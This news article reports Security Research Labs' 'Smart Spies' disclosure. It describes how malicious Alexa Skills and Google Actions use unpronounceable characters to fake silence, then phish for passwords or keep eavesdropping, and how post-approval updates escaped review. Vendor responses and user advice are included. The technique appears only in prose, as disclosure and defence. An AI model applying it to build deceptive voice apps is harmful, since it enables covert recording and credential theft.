It’s no secret that smart speakers are listening in on you despite the excuses that manufacturers make. But while you may have thought it was just Google and Amazon listening in, security researchers have found Alexa and Google Assistant speakers can be manipulated by hackers to eavesdrop and phish for your passwords.
The vulnerability—dubbed Smart Spies—was discovered by Security Research Labs, a German hacking research collective and think tank. To phish for passwords, the group discovered a hacker could add a long pause by making the app “say” an unpronounceable character sequence: “�.” That means a hacker could easily create an app, open with an error message, (i.e., This skill is not available in your country), add a pause to make you think it’s stopped listening, and then prompt you to update by stating your password, email, or other identifying information. You can see a video demo of how that would below. (There’s also a video for Google.)
To eavesdrop, hackers can use that same unpronounceable character set to trick a user into thinking the device has stopped listening…and then further record conversations that then get transcribed and sent to a hacker’s server. It’s an exploit that works both on Amazon and Google devices. That said, it’s even more terrifying on the Google Home. That’s because unlike with Amazon Alexa devices, Google Home does not require hackers to specify trigger words to start recording. That means theoretically, a hacker could manipulate a Google Home device to create an infinite loop. So long as you say something within a 30-second time frame, the device will keep recording your conversation, as shown in the video below. (Here’s the same for Alexa.)
Part of the problem lies with the approval process for smart speaker apps—or, Skills as they’re called for Alexa, and Actions for Google Home. Like on your smartphone, third-party developers can create whatever apps they want and after an approval process, they get added to a store for download. The thing is, neither Google nor Amazon performs a review of additional updates once an app has been approved. Meaning, once a bad actor gets an initially innocuous app approved, they can then go back and add some fishy nonsense without being detected. (That’s exactly what Security Research Labs did to create its phishing and eavesdropping apps.)
In an email, Security Research labs told Gizmodo that the vulnerability had been discovered in February this year. “We were surprised to see the Smart Spies hacks still worked more than three months after reporting the issues to Google and Amazon.” In their blog, the group noted that voice app reviews needed to explicitly search for unpronounceable characters, silent SSML messages, and suspicious output texts like “passwords.”
“Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified,” an Amazon spokesperson told Gizmodo. “It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password.”
Likewise, Google had a similar response. “All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies,” a spokesperson told Gizmodo via email. “We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.”
In general, it’s a good reminder to be incredibly wary of any smart speaker asking for your password. Amazon and Google will never ask you for it. And in the case of certain Alexa devices, it’s helpful to check for that blue ring that indicates when the device is listening. In Security Research Labs’ demos, you can still see the blue ring is active even when the app is pretending to be silent. (That said, it can be hard to notice when you’re busy doing other things like running around the kitchen or folding laundry.) And, under the worst conditions, unplug the bastards. Better yet, if you can avoid it, don’t bring these dystopian nightmares into your home.